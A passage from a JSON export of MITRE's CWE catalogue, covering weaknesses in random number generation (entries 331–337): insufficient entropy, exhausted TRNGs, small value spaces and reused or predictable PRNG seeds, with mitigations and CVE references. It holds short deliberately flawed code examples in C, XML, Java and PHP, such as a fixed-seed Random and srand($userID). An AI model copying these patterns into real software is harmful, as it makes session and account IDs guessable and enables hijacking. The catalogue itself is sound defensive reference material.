\\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes, Observed_Examples"}]}},"332":{"attr":{"@_ID":"332","@_Name":"Insufficient Entropy in PRNG","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The lack of entropy available for, or used by, a Pseudo-Random Number Generator (PRNG) can be a stability and security threat.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"331","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If a pseudo-random number generator is using a limited entropy source which runs out (if the generator fails closed), the program may pause or crash."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"If a PRNG is using a limited entropy source which runs out, and the generator fails open, the generator could produce predictable random numbers. Potentially a weak source of random numbers could weaken the encryption method used for authentication of users."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"Phase":"Implementation","Description":"Consider a PRNG that re-seeds itself as needed from high-quality pseudo-random output, such as hardware devices."},{"Phase":"Architecture and Design","Description":"When deciding which PRNG to use, look at its sources of entropy. Depending on what your security needs are, you may need to use a random number generator that always uses strong random data -- i.e., a random number generator that attempts to be strong but will fail in a weak way or will always provide some middle ground of protection through techniques like re-seeding. Generally, something that always provides a predictable amount of strength is preferable."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-1715","Description":"security product has insufficient entropy in the DRBG, allowing collisions and private key discovery","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1715"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Insufficient entropy in PRNG"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"333":{"attr":{"@_ID":"333","@_Name":"Improper Handling of Insufficient Entropy in TRNG","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"True random number generators (TRNG) generally have a limited source of entropy and therefore can fail or block.","Extended_Description":"The rate at which true random numbers can be generated is limited. It is important that one uses them only when they are needed for security.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"331","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"A program may crash or block if it runs out of random numbers."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Rather than failing on a lack of random numbers, it is often preferable to wait for more numbers to be created."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code uses a TRNG to generate a unique session id for new connections to a server:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"while (1){","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (haveNewConnection()){","xhtml:div":{"#text":"if (hwRandom()){} } }","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int sessionID = hwRandom();createNewConnection(sessionID);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}},"Body_Text":"This code does not attempt to limit the number of new connections or make sure the TRNG can successfully generate a new random number. An attacker may be able to create many new connections and exhaust the entropy of the TRNG. The TRNG may then block and cause the program to crash or hang."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure of TRNG"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":[{"#text":"Failure of TRNG","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Insufficient Entropy in TRNG","attr":{"@_Date":"2009-05-27"}}]}},"334":{"attr":{"@_ID":"334","@_Name":"Small Space of Random Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The number of possible random values is smaller than needed by the product, making it more susceptible to brute force attacks.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"An attacker could easily guess the values used. This could lead to unauthorized access to a system if the seed is used for authentication and authorization."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-47"},"Intro_Text":"The following XML example code is a deployment descriptor for a Java web application deployed on a Sun Java Application Server. This deployment descriptor includes a session configuration property for configuring the session ID length.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<sun-web-app></sun-web-app>","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...<session-config></session-config>...","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<session-properties></session-properties>","xhtml:div":{"#text":"<property name=\\"idLengthBytes\\" value=\\"8\\"></property>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<description>The number of bytes in this web module\'s session ID.</description>","attr":{"@_style":"margin-left:10px;"}}}}}}}}},"Body_Text":["This deployment descriptor has set the session ID length for this Java web application to 8 bytes (or 64 bits). The session ID length for Java web applications should be set to 16 bytes (128 bits) to prevent attackers from guessing and/or stealing a session ID and taking over a user\'s session.","Note for most application servers including the Sun Java Application Server the session ID length is by default set to 128 bits and should not be changed. And for many application servers the session ID length cannot be changed from this default setting. Check your application server documentation for the session ID length default setting and configuration options to ensure that the session ID length is set to 128 bits."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0583","Description":"Product uses 5 alphanumeric characters for filenames of expense claim reports, stored under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0583"},{"Reference":"CVE-2002-0903","Description":"Product uses small number of random numbers for a code to approve an action, and also uses predictable new user IDs, allowing attackers to hijack new accounts.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0903"},{"Reference":"CVE-2003-1230","Description":"SYN cookies implementation only uses 32-bit keys, making it easier to brute force ISN.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1230"},{"Reference":"CVE-2004-0230","Description":"Complex predictability / randomness (reduced space).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0230"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Small Space of Random Values"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 20: Weak Random Numbers." Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"335":{"attr":{"@_ID":"335","@_Name":"Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a Pseudo-Random Number Generator (PRNG) but does not correctly manage seeds.","Extended_Description":{"xhtml:p":["PRNGs are deterministic and, while their output appears\\n\\t\\t random, they cannot actually create entropy. They rely on\\n\\t\\t cryptographically secure and unique seeds for entropy so\\n\\t\\t proper seeding is critical to the secure operation of the\\n\\t\\t PRNG.","Management of seeds could be broken down into two main areas:","PRNGs require a seed as input to generate a stream of\\n\\t\\t\\t numbers that are functionally indistinguishable from\\n\\t\\t\\t random numbers. While the output is, in many cases,\\n\\t\\t\\t sufficient for cryptographic uses, the output of any\\n\\t\\t\\t PRNG is directly determined by the seed provided as\\n\\t\\t\\t input. If the seed can be ascertained by a third party,\\n\\t\\t\\t the entire output of the PRNG can be made known to\\n\\t\\t\\t them. As such, the seed should be kept secret and\\n\\t\\t\\t should ideally not be able to be guessed. For example,\\n\\t\\t\\t the current time may be a poor seed. Knowing the\\n\\t\\t\\t approximate time the PRNG was seeded greatly reduces\\n\\t\\t\\t the possible key space.","Seeds do not necessarily need to be unique, but reusing seeds may open up attacks if the seed is discovered."],"xhtml:ul":{"xhtml:li":["(1) protecting seeds as cryptographic material (such as a cryptographic key);","(2) whenever possible, using a uniquely generated seed from\\n\\t\\t a cryptographically secure source"]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"If a PRNG is used incorrectly, such as using the same seed for each initialization or using a predictable seed, then an attacker may be able to easily guess the seed and thus the random numbers. This could lead to unauthorized access to a system if the seed is used for authentication and authorization."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-11495","Description":"server uses erlang:now() to seed the PRNG, which\\n\\t\\t\\t results in a small search space for potential random\\n\\t\\t\\t seeds","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11495"},{"Reference":"CVE-2018-12520","Description":"Product\'s PRNG is not seeded for the generation of session IDs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12520"},{"Reference":"CVE-2016-10180","Description":"Router\'s PIN generation is based on rand(time(0)) seeding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10180"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"PRNG Seed Error"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 20: Weak Random Numbers." Page 299"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Modes_of_Introduction, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description, Maintenance_Notes, Observed_Examples"}],"Previous_Entry_Name":{"#text":"PRNG Seed Error","attr":{"@_Date":"2017-11-08"}}}},"336":{"attr":{"@_ID":"336","@_Name":"Same Seed in Pseudo-Random Number Generator (PRNG)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A Pseudo-Random Number Generator (PRNG) uses the same seed each time the product is initialized.","Extended_Description":"Given the deterministic nature of PRNGs, using the same seed for each initialization will lead to the same output in the same order. If an attacker can guess (or knows) the seed, then the attacker may be able to determine the random numbers that will be produced from the PRNG.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"335","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The developer might not consider the need to use new seeds during design."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Other","Access Control"],"Impact":["Other","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not reuse PRNG seeds. Consider a PRNG that periodically re-seeds itself as needed from a high quality pseudo-random output, such as hardware devices."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code uses a statistical PRNG to generate account IDs.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private static final long SEED = 1234567890;public int generateAccountID() {}","xhtml:br":"","xhtml:div":{"#text":"Random random = new Random(SEED);return random.nextInt();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Because the program uses the same seed value for every invocation of the PRNG, its values are predictable, making the system vulnerable to attack."},{"attr":{"@_Demonstrative_Example_ID":"DX-45"},"Intro_Text":"This code attempts to generate a unique random identifier for a user\'s session.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function generateSessionID($userID){}","xhtml:div":{"#text":"srand($userID);return rand();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["Because the seed for the PRNG is always the user\'s ID, the session ID will always be the same. An attacker could thus predict any user\'s session ID and potentially hijack the session.","If the user IDs are generated sequentially, or otherwise restricted to a narrow range of values, then this example also exhibits a Small Seed Space (CWE-339)."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Same Seed in PRNG"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267","@_Section":"Annex C, Approved Random Number Generators"}},{"attr":{"@_External_Reference_ID":"REF-1192"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Modes_of_Introduction, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, References"}],"Previous_Entry_Name":{"#text":"Same Seed in PRNG","attr":{"@_Date":"2017-11-08"}}}},"337":{"attr":{"@_ID":"337","@_Name":"Predictable Seed in Pseudo-Random Number Generator (PRNG)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A Pseudo-Random Number Generator (PRNG) is initialized from a predictable 